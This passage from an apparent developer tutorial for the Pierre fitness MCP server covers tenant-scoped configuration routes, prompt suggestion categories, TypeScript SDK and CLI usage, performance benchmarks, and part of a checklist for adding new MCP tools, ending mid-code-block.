#![allow(unused)]
fn main() {
/// Request to save fitness configuration
#[derive(Debug, Deserialize)]
pub struct SaveFitnessConfigRequest {
/// Configuration name (defaults to "default")
pub configuration_name: Option<String>,
/// Fitness configuration data
pub configuration: FitnessConfig,
}
/// Response containing fitness configuration details
#[derive(Debug, Serialize)]
pub struct FitnessConfigurationResponse {
pub id: String,
pub tenant_id: String,
pub user_id: Option<String>,
pub configuration_name: String,
pub configuration: FitnessConfig,
pub created_at: String,
pub updated_at: String,
pub metadata: ResponseMetadata,
}
/// Response containing list of available fitness configurations
#[derive(Debug, Serialize)]
pub struct FitnessConfigurationListResponse {
pub configurations: Vec<String>,
pub total_count: usize,
pub metadata: ResponseMetadata,
}
}
FitnessConfig (from crate::config::fitness_config) holds the actual structured configuration (zones, algorithm selection enums, etc.), while the routes add multi-tenant context and standard response metadata.
Listing Configurations
Source: src/fitness_configuration_routes.rs:90-141
#![allow(unused)]
fn main() {
/// Fitness configuration routes handler
#[derive(Clone)]
pub struct FitnessConfigurationRoutes {
resources: Arc<crate::mcp::resources::ServerResources>,
}
impl FitnessConfigurationRoutes {
/// GET /api/fitness-configurations - List all configuration names for user
pub async fn list_configurations(
&self,
auth: &AuthResult,
) -> AppResult<FitnessConfigurationListResponse> {
let processing_start = std::time::Instant::now();
let user_id = auth.user_id;
let tenant_id = self.get_user_tenant(user_id).await?;
let tenant_id_str = tenant_id.to_string();
let user_id_str = user_id.to_string();
// Get both user-specific and tenant-level configurations
let mut configurations = self
.resources
.database
.list_user_fitness_configurations(&tenant_id_str, &user_id_str)
.await?;
let tenant_configs = self
.resources
.database
.list_tenant_fitness_configurations(&tenant_id_str)
.await?;
configurations.extend(tenant_configs);
configurations.sort();
configurations.dedup();
Ok(FitnessConfigurationListResponse {
total_count: configurations.len(),
configurations,
metadata: Self::create_metadata(processing_start),
})
}
}
}
Key detail: the list endpoint merges user-specific and tenant-level configs, deduplicates them, and returns a simple list of names. This mirrors how the MCP tools can resolve configuration precedence (user overrides tenant defaults).
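The merge-and-dedup behavior can be sketched in a few lines (hypothetical helper, standing in for the database calls in list_configurations):

```rust
// User-level and tenant-level config names are combined into one
// deduplicated, sorted list, mirroring list_configurations above.
fn merged_config_names(user: Vec<String>, tenant: Vec<String>) -> Vec<String> {
    let mut all = user;
    all.extend(tenant);
    all.sort();
    all.dedup(); // dedup only removes adjacent duplicates, hence the sort first
    all
}

fn main() {
    let user = vec!["default".to_string(), "marathon-block".to_string()];
    let tenant = vec!["default".to_string(), "team-baseline".to_string()];
    let names = merged_config_names(user, tenant);
    // "default" appears once even though both scopes define it.
    assert_eq!(names, ["default", "marathon-block", "team-baseline"]);
}
```

Note that the list endpoint only returns names; which config wins at read time (user over tenant) is decided by the resolution logic, not by this list.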
Resolving Tenant Context
get_user_tenant extracts the tenant ID from the authenticated user.
Source: src/fitness_configuration_routes.rs:66-88
#![allow(unused)]
fn main() {
async fn get_user_tenant(&self, user_id: Uuid) -> AppResult<Uuid> {
let user = self
.resources
.database
.get_user(user_id)
.await?
.ok_or_else(|| AppError::not_found(format!("User {user_id}")))?;
let tenant_id = user
.tenant_id
.as_ref()
.and_then(|id| Uuid::parse_str(id).ok())
.ok_or_else(||
AppError::invalid_input(format!("User has no valid tenant: {user_id}"))
)?;
Ok(tenant_id)
}
}
This helper is reused across fitness configuration handlers to ensure every configuration is bound to the correct tenant.
Prompt Suggestions System
Pierre includes a database-backed prompt suggestions system for AI chat interfaces. Prompts are organized into categories with visual theming based on “pillars” (Activity, Nutrition, Recovery).
Pillar Types
Source: src/database/prompts.rs
#![allow(unused)]
fn main() {
/// Pillar types for visual categorization of prompts
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "lowercase")]
pub enum Pillar {
/// Activity pillar (Emerald gradient)
Activity,
/// Nutrition pillar (Amber gradient)
Nutrition,
/// Recovery pillar (Indigo gradient)
Recovery,
}
}
Prompt Category Model
#![allow(unused)]
fn main() {
/// A prompt suggestion category with its prompts
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PromptCategory {
/// Unique ID
pub id: Uuid,
/// Tenant this category belongs to
pub tenant_id: String,
/// Unique key (e.g., "training", "nutrition")
pub category_key: String,
/// Display title
pub category_title: String,
/// Emoji icon
pub category_icon: String,
/// Visual pillar classification
pub pillar: Pillar,
/// List of prompt suggestions
pub prompts: Vec<String>,
/// Display order (lower numbers shown first)
pub display_order: i32,
/// Whether active
pub is_active: bool,
}
}
Default Categories
New tenants receive default prompt categories:
| Category | Icon | Pillar | Sample Prompts |
|---|---|---|---|
| Training | 🏃 | Activity | “What should I focus on today?”, “Analyze my form” |
| Nutrition | 🥗 | Nutrition | “Plan my pre-workout meal”, “Calculate my macros” |
| Recovery | 😴 | Recovery | “Review my sleep quality”, “Optimize my recovery” |
API Endpoints
Source: src/routes/prompts.rs
| Method | Endpoint | Description |
|---|---|---|
| GET | /api/prompts/categories | List active categories for tenant |
| POST | /api/prompts/categories | Create new category |
| PUT | /api/prompts/categories/:key | Update category |
| DELETE | /api/prompts/categories/:key | Delete category |
| GET | /api/prompts/welcome | Get welcome prompt for new users |
Response Format
{
"categories": [
{
"category_key": "training",
"category_title": "Training",
"category_icon": "🏃",
"pillar": "activity",
"prompts": [
"What should I focus on in today's training?",
"Analyze my running form from recent activities"
]
}
]
}
Tenant Isolation
Prompts are strictly tenant-isolated:
- Each tenant has their own prompt categories
- Categories are scoped by tenant_id in all queries
- Tenants can customize prompts without affecting others
Relationship to Earlier Chapters
- Chapter 7 (multi-tenant isolation): Covered database-level tenant separation; here you see the HTTP admin surface for managing tenants.
- Chapters 15–16 (OAuth server & client): Explained OAuth protocols; tenant routes add per-tenant OAuth credentials and app registration.
- Chapter 19 (tools guide): Configuration tools like get_fitness_config and set_fitness_config ultimately call into these REST routes under the hood (directly or via internal services).
- Chapter 26 (LLM providers): Prompt suggestions power the AI chat interface that uses LLM providers.
Key Takeaways
- Tenants: Represent customers, each with their own slug, domain, plan, and OAuth configuration.
- Tenant OAuth: ConfigureTenantOAuthRequest binds provider credentials to a tenant, enabling “bring your own app” flows.
- OAuth apps: Tenants can register OAuth clients for integrating external MCP tooling with Pierre.
- Fitness configs: Tenant- and user-scoped fitness configurations are stored via dedicated REST routes and used by intelligence algorithms.
- Precedence: User configs override tenant defaults, but both are visible via list_configurations.
- Prompt suggestions: Tenant-scoped prompt categories power AI chat interfaces with visual pillar theming.
- Admin APIs: These HTTP routes are the operational surface for SaaS administrators and automation tools.
Chapter 29: TypeScript SDK & CLI Usage
This appendix explains how to use the Pierre TypeScript SDK and command-line interface to connect MCP hosts to the Pierre server. You’ll learn about the main SDK entry points, CLI flags, and environment-driven configuration.
SDK Entrypoint
The SDK exposes the MCP bridge client and all generated tool types from a single module.
Source: sdk/src/index.ts:1-20
// ABOUTME: Main entry point for Pierre MCP Client TypeScript SDK
// ABOUTME: Re-exports MCP client and configuration for programmatic integration
/**
* Pierre MCP Client SDK
*/
export { PierreMcpClient, BridgeConfig } from './bridge';
/**
* Export all TypeScript type definitions for Pierre MCP tools
*
* These types are auto-generated from server tool schemas.
* To regenerate: npm run generate-types
*/
export * from './types';
Usage (programmatic):
import { PierreMcpClient, BridgeConfig } from 'pierre-mcp-client-sdk';
const config: BridgeConfig = {
pierreServerUrl: 'https://api.pierre.ai',
jwtToken: process.env.PIERRE_JWT_TOKEN,
};
const client = new PierreMcpClient(config);
await client.start();
// ... interact via MCP stdio protocol ...
Programmatic usage is mostly relevant if you are embedding Pierre into a larger Node-based MCP host; for most users, the CLI wrapper is the primary entrypoint.
CLI Overview
The CLI wraps PierreMcpClient and exposes it as a standard MCP client binary.
Source: sdk/src/cli.ts:1-29
#!/usr/bin/env bun
// ABOUTME: Command-line interface for Pierre MCP Client
// ABOUTME: Parses arguments, configures MCP client, and manages process lifecycle
/**
* Pierre MCP Client CLI
*
* MCP-compliant client connecting MCP hosts to Pierre Fitness MCP Server (HTTP + OAuth 2.0)
*/
import { Command } from 'commander';
import { PierreMcpClient } from './bridge';
// DEBUG: Log environment at startup (stderr only - stdout is for MCP protocol)
console.error('[DEBUG] Bridge CLI starting...');
console.error('[DEBUG] CI environment variables:');
console.error(` process.env.CI = ${process.env.CI}`);
console.error(` process.env.GITHUB_ACTIONS = ${process.env.GITHUB_ACTIONS}`);
console.error(` process.env.NODE_ENV = ${process.env.NODE_ENV}`);
console.error('[DEBUG] Auth environment variables:');
console.error(` PIERRE_JWT_TOKEN = ${process.env.PIERRE_JWT_TOKEN ? '[SET]' : '[NOT SET]'}`);
console.error(` PIERRE_SERVER_URL = ${process.env.PIERRE_SERVER_URL || '[NOT SET]'}`);
const program = new Command();
Design details:
- All debug logs go to stderr so stdout remains clean JSON-RPC for MCP.
- commander handles argument parsing, default values, and --help output.
- The CLI is intended to be invoked by an MCP host (e.g., Claude Desktop, VS Code, etc.).
CLI Options & Environment Variables
The CLI exposes a set of options with sensible environment fallbacks.
Source: sdk/src/cli.ts:31-63
program
.name('pierre-mcp-client')
.description('MCP client connecting to Pierre Fitness MCP Server')
.version('1.0.0')
.option('-s, --server <url>', 'Pierre MCP server URL', process.env.PIERRE_SERVER_URL || 'http://localhost:8080')
.option('-t, --token <jwt>', 'JWT authentication token', process.env.PIERRE_JWT_TOKEN)
.option('--oauth-client-id <id>', 'OAuth 2.0 client ID', process.env.PIERRE_OAUTH_CLIENT_ID)
.option('--oauth-client-secret <secret>', 'OAuth 2.0 client secret', process.env.PIERRE_OAUTH_CLIENT_SECRET)
.option('--user-email <email>', 'User email for automated login', process.env.PIERRE_USER_EMAIL)
.option('--user-password <password>', 'User password for automated login', process.env.PIERRE_USER_PASSWORD)
.option('--callback-port <port>', 'OAuth callback server port', process.env.PIERRE_CALLBACK_PORT || '35535')
.option('--no-browser', 'Disable automatic browser opening for OAuth (testing mode)')
.option('--token-validation-timeout <ms>', 'Token validation timeout in milliseconds (default: 3000)', process.env.PIERRE_TOKEN_VALIDATION_TIMEOUT_MS || '3000')
.option('--proactive-connection-timeout <ms>', 'Proactive connection timeout in milliseconds (default: 5000)', process.env.PIERRE_PROACTIVE_CONNECTION_TIMEOUT_MS || '5000')
.option('--proactive-tools-list-timeout <ms>', 'Proactive tools list timeout in milliseconds (default: 3000)', process.env.PIERRE_PROACTIVE_TOOLS_LIST_TIMEOUT_MS || '3000')
.option('--tool-call-connection-timeout <ms>', 'Tool-triggered connection timeout in milliseconds (default: 10000)', process.env.PIERRE_TOOL_CALL_CONNECTION_TIMEOUT_MS || '10000')
Common environment variables:
- PIERRE_SERVER_URL: Base URL for the Pierre server (https://api.pierre.ai in production).
- PIERRE_JWT_TOKEN: Pre-issued JWT for authenticating the bridge (see Chapters 6 and 15).
- PIERRE_OAUTH_CLIENT_ID / PIERRE_OAUTH_CLIENT_SECRET: OAuth client for the bridge itself.
- PIERRE_USER_EMAIL / PIERRE_USER_PASSWORD: For automated login flows (CI/testing).
- PIERRE_CALLBACK_PORT: Port for the local OAuth callback HTTP server.
Example CLI invocation:
# Minimal: rely on environment variables
export PIERRE_SERVER_URL="https://api.pierre.ai"
export PIERRE_JWT_TOKEN="<your-jwt>"
pierre-mcp-client
# Explicit flags (override env)
pierre-mcp-client \
--server https://api.pierre.ai \
--token "$PIERRE_JWT_TOKEN" \
--oauth-client-id "$PIERRE_OAUTH_CLIENT_ID" \
--oauth-client-secret "$PIERRE_OAUTH_CLIENT_SECRET" \
--no-browser
Bridge Configuration Wiring
The CLI simply maps parsed options into a BridgeConfig and starts the bridge.
Source: sdk/src/cli.ts:63-92
.action(async (options) => {
try {
const bridge = new PierreMcpClient({
pierreServerUrl: options.server,
jwtToken: options.token,
oauthClientId: options.oauthClientId,
oauthClientSecret: options.oauthClientSecret,
userEmail: options.userEmail,
userPassword: options.userPassword,
callbackPort: parseInt(options.callbackPort, 10),
disableBrowser: !options.browser,
tokenValidationTimeoutMs: parseInt(options.tokenValidationTimeout, 10),
proactiveConnectionTimeoutMs: parseInt(options.proactiveConnectionTimeout, 10),
proactiveToolsListTimeoutMs: parseInt(options.proactiveToolsListTimeout, 10),
toolCallConnectionTimeoutMs: parseInt(options.toolCallConnectionTimeout, 10)
});
await bridge.start();
// Store bridge instance for cleanup on shutdown
(global as any).__bridge = bridge;
} catch (error) {
console.error('Bridge failed to start:', error);
process.exit(1);
}
});
See Chapter 13 for a deeper dive into PierreMcpClient and the BridgeConfig fields (OAuth flows, secure token storage, proactive connections, etc.). The CLI is a thin wrapper on that logic.
Graceful Shutdown
The CLI handles termination signals and calls bridge.stop() to clean up resources.
Source: sdk/src/cli.ts:94-134
// Handle graceful shutdown
let shutdownInProgress = false;
const handleShutdown = (signal: string) => {
if (shutdownInProgress) {
console.error('\n⚠️ Forcing immediate exit...');
process.exit(1);
}
shutdownInProgress = true;
console.error(`\n🛑 Bridge shutting down (${signal})...`);
const bridge = (global as any).__bridge;
if (bridge) {
bridge.stop()
.then(() => {
console.error('✅ Bridge stopped cleanly');
process.exit(0);
})
.catch((error: any) => {
console.error('Error during shutdown:', error);
process.exit(1);
});
} else {
process.exit(0);
}
};
process.on('SIGINT', () => handleShutdown('SIGINT'));
process.on('SIGTERM', () => handleShutdown('SIGTERM'));
program.parse();
Why this matters:
- MCP hosts often manage client processes; clean shutdown avoids leaving stuck TCP connections or zombie OAuth callback servers.
- Double-pressing Ctrl+C forces immediate exit if shutdown is already in progress.
Typical MCP Host Configuration
Most MCP hosts require a JSON manifest pointing to the CLI binary, for example:
{
"name": "pierre-fitness",
"command": "pierre-mcp-client",
"args": [],
"env": {
"PIERRE_SERVER_URL": "https://api.pierre.ai",
"PIERRE_JWT_TOKEN": "${PIERRE_JWT_TOKEN}"
}
}
The host spawns pierre-mcp-client, speaks JSON-RPC 2.0 over stdio, and the bridge translates MCP calls into HTTP/OAuth interactions with the Pierre server.
Key Takeaways
- SDK entrypoint: sdk/src/index.ts re-exports PierreMcpClient, BridgeConfig, and all tool types for programmatic use.
- CLI wrapper: pierre-mcp-client is a thin layer over PierreMcpClient that wires CLI options into BridgeConfig.
- Env-driven config: Most options have environment fallbacks, enabling headless and CI-friendly setups.
- Stderr vs stdout: Debug logs go to stderr so stdout remains pure MCP JSON-RPC.
- Graceful shutdown: Signal handlers call bridge.stop() to close connections and clean up resources.
- Host integration: MCP hosts simply execute the CLI and communicate over stdio; no extra glue code is required.
Chapter 30: Performance Characteristics & Benchmarks
This appendix documents Pierre’s performance characteristics, optimization strategies, and benchmarking guidelines for production deployments.
Performance Overview
Pierre is designed for low-latency fitness data processing with the following targets:
| Operation | Target Latency | Notes |
|---|---|---|
| Health check | < 5ms | No DB, no auth |
| JWT validation | < 10ms | Cached JWKS |
| Simple tool call | < 50ms | Cached data |
| Provider API call | < 500ms | Network-bound |
| TSS calculation | < 20ms | CPU-bound |
| Complex analysis | < 200ms | Multi-algorithm |
Algorithmic Complexity
Training Load Calculations
| Algorithm | Time Complexity | Space Complexity |
|---|---|---|
| Average Power TSS | O(1) | O(1) |
| Normalized Power TSS | O(n) | O(w) where w=window |
| TRIMP | O(n) | O(1) |
| CTL/ATL/TSB | O(n) | O(1) per activity |
| VO2max estimation | O(1) | O(1) |
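The O(1)-space claim for CTL/ATL in the table holds because each is an exponentially weighted moving average of daily TSS: only yesterday's value needs to be carried forward. A minimal sketch (the 42-day CTL and 7-day ATL time constants are the conventional sports-science values; the `ewma_step` helper is illustrative, not Pierre's actual function):

```rust
// One EWMA update step: fold today's TSS into the running load value.
// CTL uses a ~42-day time constant, ATL ~7 days.
fn ewma_step(yesterday: f64, todays_tss: f64, time_constant_days: f64) -> f64 {
    let alpha = 1.0 - (-1.0 / time_constant_days).exp();
    yesterday + alpha * (todays_tss - yesterday)
}

fn main() {
    // Constant 100 TSS/day: CTL converges toward 100 without storing history.
    let mut ctl = 0.0;
    for _ in 0..180 {
        ctl = ewma_step(ctl, 100.0, 42.0);
    }
    assert!((ctl - 100.0).abs() < 2.0);

    // ATL (7-day) reacts faster to the same stimulus than CTL (42-day).
    assert!(ewma_step(50.0, 100.0, 7.0) > ewma_step(50.0, 100.0, 42.0));
}
```

TSB (form) is then simply CTL minus ATL for a given day, so it is also O(1) per activity.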
Normalized Power calculation:
#![allow(unused)]
fn main() {
// O(n) where n = power samples
// O(w) space for rolling window
pub fn calculate_np(power_stream: &[f64], window_seconds: u32) -> f64 {
// 30-second rolling averages of power, each raised to the 4th power below
let window_size = window_seconds as usize;
let rolling_averages: Vec<f64> = power_stream
.windows(window_size) // O(n) iterations
.map(|w| w.iter().sum::<f64>() / w.len() as f64) // O(w) per window
.collect();
// Fourth root of mean of fourth powers
let mean_fourth = rolling_averages.iter()
.map(|p| p.powi(4))
.sum::<f64>() / rolling_averages.len() as f64;
mean_fourth.powf(0.25)
}
}
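A quick sanity check on the O(n) implementation above: a perfectly steady effort has a Normalized Power equal to its average power, since every rolling window averages to the same value. The sketch below re-declares calculate_np so it runs standalone:

```rust
// Same algorithm as the tutorial listing: rolling averages, then the
// fourth root of the mean of fourth powers.
fn calculate_np(power_stream: &[f64], window_seconds: u32) -> f64 {
    let window_size = window_seconds as usize;
    let rolling_averages: Vec<f64> = power_stream
        .windows(window_size)
        .map(|w| w.iter().sum::<f64>() / w.len() as f64)
        .collect();
    let mean_fourth = rolling_averages.iter().map(|p| p.powi(4)).sum::<f64>()
        / rolling_averages.len() as f64;
    mean_fourth.powf(0.25)
}

fn main() {
    // One hour at a constant 200 W, sampled at 1 Hz.
    let steady = vec![200.0; 3600];
    let np = calculate_np(&steady, 30);
    assert!((np - 200.0).abs() < 1e-6);

    // Variable power always yields NP >= average power (fourth-power weighting).
    let surgy: Vec<f64> = (0..3600).map(|i| if i % 2 == 0 { 300.0 } else { 100.0 }).collect();
    let avg = surgy.iter().sum::<f64>() / surgy.len() as f64;
    assert!(calculate_np(&surgy, 30) >= avg);
}
```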
Database Operations
| Operation | Complexity | Index Used |
|---|---|---|
| Get user by ID | O(1) | PRIMARY KEY |
| Get user by email | O(log n) | idx_users_email |
| List activities (paginated) | O(k + log n) | Composite index |
| Get OAuth token | O(1) | UNIQUE constraint |
| Usage analytics (monthly) | O(log n) | idx_api_key_usage_timestamp |
Memory Characteristics
Static Memory
| Component | Approximate Size |
|---|---|
| Binary size | ~45 MB |
| Startup memory | ~50 MB |
| Per connection | ~8 KB |
| SQLite pool (10 conn) | ~2 MB |
| JWKS cache | ~100 KB |
| LRU cache (default) | ~10 MB |
Dynamic Memory
Activity processing:
#![allow(unused)]
fn main() {
// Memory per activity analysis
// - Activity struct: ~500 bytes
// - Power stream (1 hour @ 1Hz): 3600 * 8 = 29 KB
// - Heart rate stream: 3600 * 8 = 29 KB
// - GPS stream: 3600 * 24 = 86 KB
// - Analysis result: ~2 KB
// Total per activity: ~150 KB peak
}
Concurrent request handling:
#![allow(unused)]
fn main() {
// Per-request memory estimate
// - Request parsing: ~4 KB
// - Auth context: ~1 KB
// - Response buffer: ~8 KB
// - Tool execution: ~50 KB (varies by tool)
// Total per request: ~65 KB average
}
Concurrency Model
Tokio Runtime Configuration
// Production runtime (src/bin/pierre-mcp-server.rs)
#[tokio::main(flavor = "multi_thread")]
async fn main() {
// Worker threads = CPU cores
// I/O threads = 2 * CPU cores
}
Connection Pooling
#![allow(unused)]
fn main() {
// SQLite pool configuration
SqlitePoolOptions::new()
.max_connections(10) // Max concurrent DB connections
.min_connections(2) // Keep-alive connections
.acquire_timeout(Duration::from_secs(30))
.idle_timeout(Some(Duration::from_secs(600)))
}
Rate Limiting
| Tier | Requests/Month | Burst Limit | Window |
|---|---|---|---|
| Trial | 1,000 | 10/min | 30 days |
| Starter | 10,000 | 60/min | 30 days |
| Professional | 100,000 | 300/min | 30 days |
| Enterprise | Unlimited | 1000/min | N/A |
Optimization Strategies
1. Lazy Loading
#![allow(unused)]
fn main() {
// Providers loaded only when needed
impl ProviderRegistry {
pub fn get(&self, name: &str) -> Option<Arc<dyn FitnessProvider>> {
// Factory creates provider on first access
self.factories.get(name)?.create_provider()
}
}
}
2. Response Caching
#![allow(unused)]
fn main() {
// LRU cache for expensive computations
pub struct Cache {
lru: Mutex<LruCache<String, CacheEntry>>,
default_ttl: Duration,
}
// Cache key patterns
// - activities:{provider}:{user_id} -> Vec<Activity>
// - athlete:{provider}:{user_id} -> Athlete
// - stats:{provider}:{user_id} -> Stats
// - analysis:{activity_id} -> AnalysisResult
}
3. Query Optimization
#![allow(unused)]
fn main() {
// Efficient pagination with cursor-based approach
pub async fn list_activities_paginated(
&self,
user_id: Uuid,
cursor: Option<&str>,
limit: u32,
) -> Result<CursorPage<Activity>> {
// Uses indexed seek instead of OFFSET
sqlx::query_as!(
Activity,
r#"
SELECT * FROM activities
WHERE user_id = ?1 AND id > ?2
ORDER BY id
LIMIT ?3
"#,
user_id,
cursor.unwrap_or(""),
limit + 1 // Fetch one extra to detect has_more
)
.fetch_all(&self.pool)
.await
}
}
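The limit + 1 trick in the query above avoids a second COUNT round-trip: fetch one extra row, and its presence tells you whether another page exists. A standalone sketch of that post-processing step (hypothetical helper operating on plain integers rather than Activity rows):

```rust
// Trim the over-fetched page back to `limit` rows and report whether
// the extra row was present (i.e., more pages exist).
fn page_with_cursor(mut rows: Vec<u32>, limit: usize) -> (Vec<u32>, bool) {
    let has_more = rows.len() > limit;
    rows.truncate(limit);
    (rows, has_more)
}

fn main() {
    // The query asked for limit+1 = 4 rows and got all 4 back: more pages exist.
    let (page, has_more) = page_with_cursor(vec![1, 2, 3, 4], 3);
    assert_eq!(page, [1, 2, 3]);
    assert!(has_more);

    // Only 2 rows came back for limit 3: this is the last page.
    let (last, has_more) = page_with_cursor(vec![5, 6], 3);
    assert_eq!(last, [5, 6]);
    assert!(!has_more);
}
```

The cursor for the next page is then simply the id of the last row returned, which the indexed `id > ?2` seek resumes from in O(log n).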
4. Zero-Copy Serialization
#![allow(unused)]
fn main() {
// Use Cow<str> for borrowed strings
pub struct ActivityResponse<'a> {
pub id: Cow<'a, str>,
pub name: Cow<'a, str>,
// Avoids cloning when data comes from cache
}
}
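The payoff of the Cow<str> pattern is that one response type serves both the cache-hit path (borrow, no allocation) and the fresh-fetch path (own the data). A runnable sketch (the two constructor functions are illustrative, not Pierre's API):

```rust
use std::borrow::Cow;

// Minimal stand-in for the ActivityResponse above.
struct ActivityResponse<'a> {
    name: Cow<'a, str>,
}

// Cache hit: borrow straight out of the cache entry, zero copies.
fn from_cache(cached_name: &str) -> ActivityResponse<'_> {
    ActivityResponse { name: Cow::Borrowed(cached_name) }
}

// Provider fetch: the response owns the freshly downloaded string.
fn from_provider(fetched_name: String) -> ActivityResponse<'static> {
    ActivityResponse { name: Cow::Owned(fetched_name) }
}

fn main() {
    let cache_entry = String::from("Morning Run");
    let borrowed = from_cache(&cache_entry);
    let owned = from_provider(String::from("Evening Ride"));
    assert!(matches!(borrowed.name, Cow::Borrowed(_)));
    assert!(matches!(owned.name, Cow::Owned(_)));
}
```

Because serde serializes Cow<str> like a plain string, the JSON output is identical on both paths; only the allocation behavior differs.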
Benchmarking Guidelines
Running Benchmarks
# Install criterion
cargo install cargo-criterion
# Run all benchmarks
cargo criterion
# Run specific benchmark
cargo criterion --bench tss_calculation
# Save a named baseline for later comparison
cargo criterion --bench tss_calculation -- --save-baseline main
Example Benchmark
#![allow(unused)]
fn main() {
// benches/tss_benchmark.rs
use criterion::{black_box, criterion_group, criterion_main, Criterion};
fn tss_benchmark(c: &mut Criterion) {
let activity = create_test_activity(3600); // 1 hour
c.bench_function("tss_avg_power", |b| {
b.iter(|| {
TssAlgorithm::AvgPower.calculate(
black_box(&activity),
black_box(250.0),
black_box(1.0),
)
})
});
c.bench_function("tss_normalized_power", |b| {
b.iter(|| {
TssAlgorithm::NormalizedPower { window_seconds: 30 }
.calculate(
black_box(&activity),
black_box(250.0),
black_box(1.0),
)
})
});
}
criterion_group!(benches, tss_benchmark);
criterion_main!(benches);
}
Expected Results
| Benchmark | Expected Time | Acceptable Range |
|---|---|---|
| TSS (avg power) | 50 ns | < 100 ns |
| TSS (normalized) | 15 µs | < 50 µs |
| JWT validation | 100 µs | < 500 µs |
| Activity parse | 200 µs | < 1 ms |
| SQLite query | 500 µs | < 5 ms |
Production Monitoring
Key Metrics
#![allow(unused)]
fn main() {
// Prometheus metrics exposed at /metrics
counter!("pierre_requests_total", "method" => method, "status" => status);
histogram!("pierre_request_duration_seconds", "method" => method);
gauge!("pierre_active_connections");
gauge!("pierre_db_pool_connections");
counter!("pierre_provider_requests_total", "provider" => provider);
histogram!("pierre_provider_latency_seconds", "provider" => provider);
}
Alert Thresholds
| Metric | Warning | Critical |
|---|---|---|
| Request latency p99 | > 500ms | > 2s |
| Error rate | > 1% | > 5% |
| DB pool saturation | > 70% | > 90% |
| Memory usage | > 70% | > 90% |
| Provider latency p99 | > 2s | > 10s |
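Alerting on a p99 requires computing the percentile from recorded latency samples. A minimal sketch using the nearest-rank method (function name and approach are illustrative; Prometheus histograms estimate quantiles from buckets rather than raw samples):

```rust
/// Nearest-rank percentile: the value at index ceil(p/100 * n) - 1
/// of the sorted sample.
fn percentile(samples: &mut [u64], p: f64) -> u64 {
    assert!(!samples.is_empty() && (0.0..=100.0).contains(&p));
    samples.sort_unstable();
    let rank = ((p / 100.0) * samples.len() as f64).ceil() as usize;
    samples[rank.saturating_sub(1)]
}

fn main() {
    // Latencies in milliseconds: 99 fast requests and one slow outlier.
    let mut latencies: Vec<u64> = (1..=99).collect();
    latencies.push(2500);
    let p99 = percentile(&mut latencies, 99.0);
    assert_eq!(p99, 99); // the single outlier does not move p99
    assert!(p99 < 2000); // below the critical threshold in the table above
}
```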
Profiling
CPU Profiling
# Using perf
perf record -g cargo run --release
perf report
# Using flamegraph
cargo install flamegraph
cargo flamegraph --bin pierre-mcp-server
Memory Profiling
# Using heaptrack
heaptrack cargo run --release
heaptrack_gui heaptrack.pierre-mcp-server.*.gz
# Using valgrind
valgrind --tool=massif ./target/release/pierre-mcp-server
ms_print massif.out.*
Key Takeaways
- Target latencies: Simple operations < 50ms, provider calls < 500ms.
- Algorithm efficiency: NP-TSS is O(n), use AvgPower-TSS for quick estimates.
- Memory footprint: ~50MB baseline, ~150KB per activity analysis.
- Connection pooling: 10 SQLite connections handle typical workloads.
- Cursor pagination: Avoids O(n) OFFSET performance degradation.
- LRU caching: Reduces provider API calls and computation.
- Prometheus metrics: Monitor latency, error rates, pool saturation.
- Benchmark before optimizing: Use criterion for reproducible measurements.
Related Chapters:
- Chapter 20: Sports Science Algorithms (algorithm complexity)
- Chapter 25: Deployment (production configuration)
- Appendix E: Rate Limiting (quota management)
Chapter 31: Adding New MCP Tools - Complete Checklist
This appendix provides a comprehensive checklist for adding new MCP tools to Pierre. Following this checklist ensures tools are properly integrated across all layers and tested.
Quick Reference Checklist
Use this checklist when adding new tools:
□ 1. Constants - src/constants/tools/identifiers.rs
□ 2. Schema - src/mcp/schema.rs (import + create_*_tool fn + register)
□ 3. ToolId Enum - src/protocols/universal/tool_registry.rs (enum + from_name + name)
□ 4. Handler - src/protocols/universal/handlers/*.rs
□ 5. Executor - src/protocols/universal/executor.rs (import + register)
□ 6. Tests - tests/mcp_tools_unit.rs (presence + schema validation)
□ 7. Tests - tests/schema_completeness_test.rs (critical tools list)
□ 8. SDK Tests - sdk/test/integration/tool-call-validation.test.js
□ 9. Docs - docs/tools-reference.md
□ 10. Tutorial - docs/tutorial/chapter-19-tools-guide.md (update counts)
□ 11. Clippy - cargo clippy --all-targets (strict mode)
□ 12. Run Tests - cargo test (targeted tests for new tools)
Step-by-Step Guide
Step 1: Add Tool Identifier Constant
File: src/constants/tools/identifiers.rs
Add a constant for your tool name:
#![allow(unused)]
fn main() {
/// Recipe management tools (Combat des Chefs)
pub const GET_RECIPE_CONSTRAINTS: &str = "get_recipe_constraints";
pub const LIST_RECIPES: &str = "list_recipes";
pub const GET_RECIPE: &str = "get_recipe";
// ... add your tool constant here
}
Why: Eliminates hardcoded strings, enables compile-time checking.
Step 2: Create Tool Schema
File: src/mcp/schema.rs
2a. Add import for your constant:
#![allow(unused)]
fn main() {
use crate::constants::tools::{
// ... existing imports ...
YOUR_NEW_TOOL, // Add your constant
};
}
2b. Create schema function:
#![allow(unused)]
fn main() {
/// Create the `your_new_tool` tool schema
fn create_your_new_tool_tool() -> ToolSchema {
let mut properties = HashMap::new();
// Add required parameters
properties.insert(
"param_name".to_owned(),
PropertySchema {
property_type: "string".into(),
description: Some("Description of parameter".into()),
},
);
// Add optional parameters
properties.insert(
"limit".to_owned(),
PropertySchema {
property_type: "number".into(),
description: Some("Maximum results (default: 10)".into()),
},
);
ToolSchema {
name: YOUR_NEW_TOOL.to_owned(), // Use constant!
description: "Clear description of what the tool does".into(),
input_schema: JsonSchema {
schema_type: "object".into(),
properties: Some(properties),
required: Some(vec!["param_name".to_owned()]), // Required params
},
}
}
}
2c. Register in create_fitness_tools():
#![allow(unused)]
fn main() {
fn create_fitness_tools() -> Vec<ToolSchema> {
vec![
// ... existing tools ...
create_your_new_tool_tool(), // Add here
]
}
}
Step 3: Add to ToolId Enum
File: src/protocols/universal/tool_registry.rs
3a. Add import:
#![allow(unused)]
fn main() {
use crate::constants::tools::{
// ... existing imports ...
YOUR_NEW_TOOL,
};
}
3b. Add enum variant:
#![allow(unused)]
fn main() {
pub enum ToolId {
// ... existing variants ...
/// Your tool description
YourNewTool,
}
}
3c. Add to from_name():
#![allow(unused)]
fn main() {
pub fn from_name(name: &str) -> Option<Self> {
match name {
// ... existing matches ...
YOUR_NEW_TOOL => Some(Self::YourNewTool),
_ => None,
}
}
}
3d. Add to name():
#![allow(unused)]
fn main() {
pub const fn name(&self) -> &'static str {
match self {
// ... existing matches ...
